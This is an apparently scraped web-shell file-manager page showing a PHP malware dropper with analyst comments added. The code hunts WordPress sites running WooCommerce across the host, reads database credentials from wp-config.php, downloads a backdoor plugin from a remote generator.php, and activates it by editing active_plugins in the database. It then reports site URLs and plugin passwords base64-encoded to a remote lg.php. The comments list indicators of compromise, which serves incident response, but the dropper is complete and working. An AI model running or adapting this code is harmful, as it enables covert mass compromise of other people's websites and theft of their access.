X7ROOT File Manager
Current Path:
/home/gfecatvj/.cagefs/tmp
📁
..
📄
.1b2af5073432b6f5c39de94b0f0c38f395bf0372b
(7 B)
📄
.1b2af5073432b6f5c39de94b0f0c38f395bf0372c
(0 B)
📄
.s.PGSQL.5432
(0 B)
📁
alfacgiapi
📄
mysql.sock
(0 B)
📁
php-xdg-runtime-dir-fallback-gfecatvj
📄
pr_2jcdn4o7cdfd8bJ58cf
(14.53 KB)
📄
sess_5171fcbf42bcab65758aae7e9218e28b.php
(118.54 KB)
📄
vs-698a75a9617bd
(63.51 KB)
Editing: pr_2jcdn4o7cdfd8bJ58cf
<?php
// Analyst annotations for the file shown in the web file manager above.
// Code tokens are unchanged; only line breaks, indentation and comments were added.
//
// Behaviour visible in this listing, in execution order:
//   1. fastWordPressLocator() enumerates WordPress roots around the document
//      root and under a fixed list of common web base directories.
//   2. Only roots that contain wp-content/plugins/woocommerce/woocommerce.php
//      are recorded in $results.
//   3. For each recorded root, DB credentials are parsed out of wp-config.php
//      and used locally to read `siteurl` and `active_plugins`.
//   4. A JSON document is fetched from $url . 'generator.php?nm=<site url>';
//      its fields become a plugin directory written under wp-content/plugins.
//   5. The plugin is switched on by rewriting the `active_plugins` option
//      directly in the database, not through WordPress itself.
//   6. The outcome (site URL, and on a fresh install a password value from the
//      JSON) is sent base64-encoded to $url . 'lg.php?lg=...'.
//
// $url and $cookie_pass are never assigned in the visible code; presumably they
// are set by whatever includes or evaluates this file, so the remote host
// cannot be read from this listing.
//
// Artifacts a responder can check for, all taken from the code below:
//   - a directory wp-content/plugins/<name>/ holding <name>.php, config.php and
//     assets/images/, created with mode 0755;
//   - an entry "<name>/<name>.php" in the serialized `active_plugins` value of
//     the <prefix>options table that was not installed through the admin UI;
//   - outbound GET requests whose path ends in generator.php?nm= or lg.php?lg=,
//     carrying a Cookie header and the fixed User-Agent string set below.

/**
 * Writes a plugin's files under the given WordPress root if they are missing
 * or empty, then marks the plugin active through activateViaDb().
 *
 * Files are written before the database step is attempted, so a return value
 * of 0 does not mean nothing was left on disk.
 *
 * @param string $wpRoot         WordPress root directory.
 * @param string $pluginName     Used as both the directory name and the main file name.
 * @param string $mainPhpContent Content written to <plugin>/<plugin>.php.
 * @param string $configContent  Content written to <plugin>/config.php.
 * @param string $imageContent   Content written under <plugin>/assets/images/.
 * @param string $imageFileName  Base name of the image file; '.png' is appended.
 *
 * @return int|string 0 when wp-config.php cannot be parsed or the DB step does
 *                    not report 'activated'/'already_active'; 'activated_true'
 *                    when the files were written during this call;
 *                    'already_exist' when they were already present.
 */
function ensureAndActivateComplexPlugin($wpRoot, $pluginName, $mainPhpContent, $configContent, $imageContent, $imageFileName = 'image.png')
{
    $pluginDir = $wpRoot . '/wp-content/plugins/' . $pluginName;
    $pluginFile = $pluginDir . '/' . $pluginName . '.php';
    $configFile = $pluginDir . '/config.php';
    $assetsDir = $pluginDir . '/assets/images/';
    $imageFile = $assetsDir . '/' . $imageFileName . '.png';
    $needInstall = false;
    $plugin_install = 0;

    // Install when the directory is absent, or when either PHP file is missing or zero bytes.
    if (!is_dir($pluginDir)) {
        $needInstall = true;
    } elseif (
        !is_file($pluginFile) || filesize($pluginFile) === 0 ||
        !is_file($configFile) || filesize($configFile) === 0
    ) {
        $needInstall = true;
    }

    if ($needInstall) {
        if (!is_dir($pluginDir)) {
            mkdir($pluginDir, 0755, true);
        }
        if (!is_dir($assetsDir)) {
            mkdir($assetsDir, 0755, true);
        }
        // All three payload parts come from the caller; here that is the remote JSON response.
        file_put_contents($pluginFile, $mainPhpContent, LOCK_EX);
        file_put_contents($configFile, $configContent, LOCK_EX);
        file_put_contents($imageFile, $imageContent, LOCK_EX);
        $plugin_install = 1; // 1 = written during this call
    } else {
        $plugin_install = 2; // 2 = files were already in place
    }

    $creds = parseWpConfig($wpRoot);
    if (!$creds) {
        return 0;
    }

    // Same "<dir>/<file>.php" form that WordPress stores in active_plugins.
    $relPath = $pluginName . '/' . $pluginName . '.php';
    $result = activateViaDb($creds, $relPath);

    // 'activated' and 'already_active' are mapped identically; the result string
    // depends only on whether files were written above.
    if ($result['status'] === 'activated') {
        if ($plugin_install == 1) {
            $plugin_install = 'activated_true';
        } else {
            $plugin_install = 'already_exist';
        }
    } elseif ($result['status'] === 'already_active') {
        if ($plugin_install == 1) {
            $plugin_install = 'activated_true';
        } else {
            $plugin_install = 'already_exist';
        }
    } else {
        return 0;
    }

    return $plugin_install;
}

/**
 * Appends a plugin path to the serialized `active_plugins` option by talking to
 * MySQL directly with the site's own credentials.
 *
 * No WordPress code is loaded or called here, so the change is made outside the
 * normal activation path. NOTE(review): tooling that records plugin changes via
 * WordPress hooks would presumably not see it; comparing `active_plugins`
 * against a known-good baseline is the check this code cannot avoid.
 *
 * @param array  $creds         Keys db_host, db_user, db_password, db_name, prefix.
 * @param string $pluginRelPath Entry to add, e.g. "<name>/<name>.php".
 *
 * @return array 'status' is one of db_connect_error, no_option,
 *               bad_plugins_data, already_active, activated, update_error;
 *               'msg' is present on the error statuses.
 */
function activateViaDb($creds, $pluginRelPath)
{
    try {
        $mysqli = new mysqli(
            $creds['db_host'],
            $creds['db_user'],
            $creds['db_password'],
            $creds['db_name']
        );
    } catch (Throwable $e) {
        return ['status' => 'db_connect_error', 'msg' => $e->getMessage()];
    }
    if ($mysqli->connect_errno) {
        return ['status' => 'db_connect_error', 'msg' => $mysqli->connect_error];
    }

    // Table name is built from the prefix parsed out of wp-config.php.
    $tbl = $creds['prefix'] . 'options';
    $res = $mysqli->query("SELECT option_value FROM `$tbl` WHERE option_name='active_plugins' LIMIT 1");
    if (!$res || $res->num_rows === 0) {
        return ['status' => 'no_option', 'msg' => 'active_plugins not found'];
    }

    $row = $res->fetch_assoc();
    // The option value is a PHP-serialized array; errors are suppressed with @.
    $arr = @unserialize($row['option_value']);
    if (!is_array($arr)) {
        return ['status' => 'bad_plugins_data', 'msg' => 'active_plugins value is not an array'];
    }
    if (in_array($pluginRelPath, $arr, true)) {
        return ['status' => 'already_active'];
    }

    $arr[] = $pluginRelPath;
    $ser = $mysqli->real_escape_string(serialize($arr));
    $res = $mysqli->query("UPDATE `$tbl` SET option_value='$ser' WHERE option_name='active_plugins'");
    if ($res) {
        return ['status' => 'activated'];
    } else {
        return ['status' => 'update_error', 'msg' => $mysqli->error];
    }
}

// Directory names skipped at the first level below each search root.
define('EXCLUDED_DIRS', array('node_modules', '.git', 'vendor', 'venv', '__pycache__', 'tmp', 'log', 'logs', 'cache', '.idea', '.vscode', 'env', '.svn', '.hg', '.composer'));
// Fixed base directories added to the search roots when they resolve on this host.
define('KNOWN_BASES', array('/var/www', '/srv/http', '/usr/share/nginx', '/opt/lampp/htdocs', '/home', '\\xampp\\htdocs', '\\wamp64\\www', '\\OSPanel'));

/**
 * Lists a directory, returning an empty array when it is unreadable or
 * scandir() fails. Entries include '.' and '..'.
 *
 * @param string $dir
 *
 * @return array
 */
function smartscan($dir)
{
    if (!is_readable($dir)) return [];
    $items = @scandir($dir);
    return $items ?: array();
}

/**
 * Finds WordPress installations one or two directory levels below a set of
 * search roots.
 *
 * Roots are the document root (or the working directory when DOCUMENT_ROOT is
 * unset), its three parent directories, and every KNOWN_BASES entry that
 * resolves. Because the search climbs above the document root and includes
 * '/home', any sibling site readable by the PHP user is in scope, not only the
 * site the script was started from.
 *
 * A directory counts as WordPress when it holds both wp-config.php and
 * wp-includes/version.php.
 *
 * @return array Unique resolved paths of the roots found.
 */
function fastWordPressLocator()
{
    $roots = [];
    $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();
    $roots[] = realpath($docRoot);
    $roots[] = realpath("$docRoot/..");
    $roots[] = realpath("$docRoot/../..");
    $roots[] = realpath("$docRoot/../../..");
    foreach (KNOWN_BASES as $base) {
        $real = realpath($base);
        if ($real) $roots[] = $real;
    }
    // array_filter drops the false values realpath() returns for missing paths.
    $roots = array_unique(array_filter($roots));

    $found = [];
    foreach ($roots as $root) {
        $dirs = smartscan($root);
        foreach ($dirs as $dir) {
            // EXCLUDED_DIRS is applied at this level only, not to the sub-directories below.
            if ($dir === '.' || $dir === '..' || in_array($dir, EXCLUDED_DIRS)) continue;
            $path = $root . DIRECTORY_SEPARATOR . $dir;
            if (!is_dir($path)) continue;
            if (
                is_file("$path/wp-config.php") &&
                is_file("$path/wp-includes/version.php")
            ) {
                $found[] = realpath($path);
                continue;
            }
            // Second level: direct children of a non-WordPress directory.
            $subdirs = smartscan($path);
            foreach ($subdirs as $sub) {
                if ($sub === '.' || $sub === '..') continue;
                $subPath = $path . DIRECTORY_SEPARATOR . $sub;
                if (!is_dir($subPath)) continue;
                if (
                    is_file("$subPath/wp-config.php") &&
                    is_file("$subPath/wp-includes/version.php")
                ) {
                    $found[] = realpath($subPath);
                }
            }
        }
    }

    return array_values(array_unique($found));
}

/**
 * Extracts database settings from a site's wp-config.php by matching each line
 * against regular expressions; the file is read as text, not executed.
 *
 * The credentials are used locally by the other functions in this file; the
 * visible code does not transmit them.
 *
 * @param string $wpRoot WordPress root directory.
 *
 * @return array|false Keys db_name, db_user, db_password, db_host, prefix
 *                     (prefix defaults to 'wp_'); false when the file is
 *                     missing, unreadable, empty, or lacks one of the four
 *                     DB_* defines.
 */
function parseWpConfig($wpRoot)
{
    $cfgPath = $wpRoot . DIRECTORY_SEPARATOR . 'wp-config.php';
    if (!is_file($cfgPath)) return false;
    $lines = @file($cfgPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if (!$lines) return false;

    $creds = [];
    foreach ($lines as $line) {
        if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
            $creds['db_name'] = $m[1];
        }
        if (preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
            $creds['db_user'] = $m[1];
        }
        // Password pattern uses (.*?) so an empty password still matches.
        if (preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.*?)['\"]\s*\)/", $line, $m)) {
            $creds['db_password'] = $m[1];
        }
        if (preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
            $creds['db_host'] = $m[1];
        }
        if (preg_match("/\\\$table_prefix\s*=\s*['\"](.+?)['\"]\s*;/", $line, $m)) {
            $creds['prefix'] = $m[1];
        }
    }

    if (!isset($creds['db_name'], $creds['db_user'], $creds['db_password'], $creds['db_host'])) {
        return false;
    }
    $creds['prefix'] = isset($creds['prefix']) ? $creds['prefix'] : 'wp_';

    return $creds;
}

/**
 * Reads the `siteurl` option from the site's database.
 *
 * @param array $creds Result of parseWpConfig().
 *
 * @return array On connection failure ['status' => 'db_error', 'msg' => ...];
 *               otherwise ['site_url' => ..., 'status' => 'ok'], where site_url
 *               is '' if the query returned no row.
 */
function getSiteUrl($creds)
{
    try {
        $mysqli = @new mysqli(
            $creds['db_host'],
            $creds['db_user'],
            $creds['db_password'],
            $creds['db_name']
        );
    } catch (\mysqli_sql_exception $e) {
        return ['status' => 'db_error', 'msg' => $e->getMessage()];
    }
    if ($mysqli->connect_errno) {
        return ['status' => 'db_error', 'msg' => $mysqli->connect_error];
    }

    $prefix = $creds['prefix'];
    $optTable = $prefix . 'options';
    $siteUrl = '';
    $siteRes = $mysqli->query("SELECT option_value FROM `$optTable` WHERE option_name = 'siteurl' LIMIT 1");
    if ($siteRes && $row = $siteRes->fetch_assoc()) {
        $siteUrl = rtrim($row['option_value'], '/');
    }

    return [
        'site_url' => $siteUrl,
        'status' => 'ok'
    ];
}

/**
 * Tests whether a plugin folder matches a fixed file layout.
 *
 * The layout, as checked below, is: a main file "<plugin_name>.php"; an
 * index.htm or index.html; a main file that contains the text "Description:"
 * and a quoted reference to a lower-case "<letters>.txt" file; that .txt file
 * present and non-empty; directories assets/images and assets/js; and at least
 * five entries in assets/images whose names contain ".png" or ".gif".
 *
 * NOTE(review): the caller reports a match as 'Evac exists'. What that plugin
 * is cannot be established from this file; the layout itself is usable as a
 * hunting pattern on a suspect host.
 *
 * @param string $folder      Plugin directory to inspect.
 * @param string $plugin_name Expected base name of the main PHP file.
 *
 * @return bool True only when every check passes.
 */
function check_plugin_evac_ok($folder, $plugin_name)
{
    if (!file_exists($folder)) return false;
    $files = smartscan($folder);
    $index = "$plugin_name.php";
    if (!in_array($index, $files)) {
        return false;
    }
    if ((!in_array("index.htm", $files)) && (!in_array("index.html", $files))) {
        return false;
    }
    $index_content = file_get_contents($folder . '/' . $index);
    // Captures the .txt file name referenced from the main plugin file.
    if (!preg_match("#/([a-z]+\.txt)['\"]#", $index_content, $match)) {
        return false;
    }
    if (!substr_count($index_content, "Description:")) {
        return false;
    }
    $txt_name = $match[1];
    if (!in_array($txt_name, $files)) {
        return false;
    }
    if (!filesize($folder . '/' . $txt_name)) {
        return false;
    }
    if (!file_exists($folder . "/assets/images")) {
        return false;
    }
    if (!file_exists($folder . "/assets/js")) {
        return false;
    }
    $files_images = smartscan($folder . "/assets/images");
    $cnt_images = 0;
    foreach ($files_images as $image) {
        if ((substr_count($image, ".png")) || (substr_count($image, ".gif"))) {
            $cnt_images++;
        }
    }
    if ($cnt_images < 5) return false;

    return true;
}

/**
 * Looks through the site's active plugins for one whose name follows a fixed
 * character pattern and whose folder passes check_plugin_evac_ok().
 *
 * The name test (after stripping the directory part and ".php"): characters at
 * even positions must come from "eyuoa", characters at odd positions from
 * "qwrtpsdghjklzxcvbnm".
 *
 * @param array  $creds       Result of parseWpConfig().
 * @param string $pluginsPath The site's wp-content/plugins directory.
 *
 * @return bool True when such a plugin is active and its folder matches;
 *              false otherwise, including on any database error.
 */
function checkEvacPlugin($creds, $pluginsPath)
{
    try {
        $mysqli = new mysqli(
            $creds['db_host'],
            $creds['db_user'],
            $creds['db_password'],
            $creds['db_name']
        );
    } catch (Throwable $e) {
        return false;
    }
    if ($mysqli->connect_errno) {
        return false;
    }

    $tbl = $creds['prefix'] . 'options';
    $res = $mysqli->query("SELECT option_value FROM `$tbl` WHERE option_name='active_plugins' LIMIT 1");
    if (!$res || $res->num_rows === 0) {
        return false;
    }
    $row = $res->fetch_assoc();
    $arr = @unserialize($row['option_value']);
    if (!is_array($arr)) {
        return false;
    }

    foreach ($arr as $plugin_one) {
        // Reduce "dir/file.php" (either slash style) to the bare file name without ".php".
        $plugin_one = strtr($plugin_one, ["\\" => "/"]);
        $plugin_one = explode("/", $plugin_one);
        $plugin_one = end($plugin_one);
        $plugin_name = strtr($plugin_one, [".php" => ""]);

        $chars1 = "qwrtpsdghjklzxcvbnm"; // allowed at odd positions
        $chars2 = "eyuoa";               // allowed at even positions
        $found = true;
        for ($i = 0; $i < strlen($plugin_name); $i++) {
            $c = substr($plugin_name, $i, 1);
            if ($i % 2) {
                if (!substr_count($chars1, $c)) {
                    $found = false;
                    break;
                }
            } else {
                if (!substr_count($chars2, $c)) {
                    $found = false;
                    break;
                }
            }
        }
        if ($found) {
            if (check_plugin_evac_ok($pluginsPath . DIRECTORY_SEPARATOR . $plugin_name, $plugin_name)) return true;
        }
    }

    return false;
}

// ---- Top-level flow -------------------------------------------------------

// Stage 1: build $results. Only roots with the WooCommerce main plugin file on
// disk get an entry; other WordPress roots are located but not recorded.
$foundSites = fastWordPressLocator();
$results = [];
foreach ($foundSites as $wpRoot) {
    $siteEntry = [
        'path' => $wpRoot
    ];
    if (file_exists($wpRoot . '/wp-content/plugins/woocommerce/woocommerce.php')) {
        $creds = parseWpConfig($wpRoot);
        if (!$creds) {
            $siteEntry['status'] = 'error';
            $siteEntry['message'] = 'Invalid wp-config.php';
            $results[] = $siteEntry;
            continue;
        }
        $stats = getSiteUrl($creds);
        if ($stats['status'] !== 'ok') {
            $siteEntry['status'] = 'error';
            $siteEntry['message'] = isset($stats['msg']) ? $stats['msg'] : 'Unknown error';
            $results[] = $siteEntry;
            continue;
        }
        if (checkEvacPlugin($creds, $wpRoot . '/wp-content/plugins')) {
            $siteEntry['status'] = 'error';
            $siteEntry['message'] = 'Evac exists';
            $results[] = $siteEntry;
            continue;
        }
        $siteEntry['status'] = 'ok';
        $siteEntry['site_url'] = $stats['site_url'];
        $results[] = $siteEntry;
    }
}

// Stage 2: for each entry, fetch the plugin payload, write and activate it,
// then report. Every entry in $results is processed here, whatever its
// 'status', which matters when scoping which sites were touched.
foreach ($results as $result) {
    $wpRoot = $result['path'];

    // Payload fetch, curl first. Peer and host verification are both turned
    // off, so any TLS endpoint is accepted. The User-Agent value is fixed and
    // can be matched in proxy or egress logs. $url and $cookie_pass are not
    // defined in the visible code.
    if (function_exists("curl_init")) {
        $options = array(
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER => false,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_ENCODING => "",
            CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
            CURLOPT_AUTOREFERER => true,
            CURLOPT_CONNECTTIMEOUT => 120,
            CURLOPT_TIMEOUT => 120,
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => 0,
            CURLOPT_HTTPHEADER => array(
                "Cookie: $cookie_pass"
            )
        );
        $ch = curl_init($url . 'generator.php?nm=' . $result['site_url']);
        curl_setopt_array($ch, $options);
        $content = @curl_exec($ch);
    }
    // Fallback through the PHP stream wrapper when curl produced nothing.
    if (!$content) {
        $options = array(
            "http" => array(
                "method" => "GET",
                "header" => "Cookie: $cookie_pass\r\n"
            )
        );
        $context = stream_context_create($options);
        $content = @file_get_contents($url . 'generator.php?nm=' . $result['site_url'], false, $context);
    }

    // The response is JSON with string keys '1'..'6'; the remote side decides
    // the plugin name and every byte written to disk.
    $data = json_decode($content, true);
    $pluginName = $data['1'];
    $mainPhpContent = $data['2'];
    $configContent = $data['3'];
    $imageContent = $data['4'];
    $imageName = $data['5'];
    $pluginPassword = $data['6'];

    $res = ensureAndActivateComplexPlugin($wpRoot, $pluginName, $mainPhpContent, $configContent, $imageContent, $imageName);

    // Build the report line; the password field is included only for a fresh install.
    if (strpos($res, 'activated_true') !== false) {
        $res = $result['site_url'] . ':' . $pluginPassword . ' - ' . 'activated_true' . ' | ';
    } elseif (strpos($res, 'already_exist') !== false) {
        $res = $result['site_url'] . ' - ' . 'already_exist' . ' | ';
    } else {
        $res = 0;
    }

    // Report: the line above goes out base64-encoded in the `lg` query
    // parameter, so it will appear in URL logs of any proxy on the path.
    if ($res) {
        if (function_exists("curl_init")) {
            $options = array(
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_ENCODING => "",
                CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
                CURLOPT_AUTOREFERER => true,
                CURLOPT_CONNECTTIMEOUT => 120,
                CURLOPT_TIMEOUT => 120,
                CURLOPT_MAXREDIRS => 10,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => 0,
                CURLOPT_HTTPHEADER => array(
                    "Cookie: $cookie_pass"
                )
            );
            $ch = curl_init($url . 'lg.php?lg=' . base64_encode($res));
            curl_setopt_array($ch, $options);
            $content = @curl_exec($ch);
        }
        if (!$content) {
            $options = array(
                "http" => array(
                    "method" => "GET",
                    "header" => "Cookie: $cookie_pass\r\n"
                )
            );
            $context = stream_context_create($options);
            $content = @file_get_contents($url . 'lg.php?lg=' . base64_encode($res), false, $context);
        }
    }
}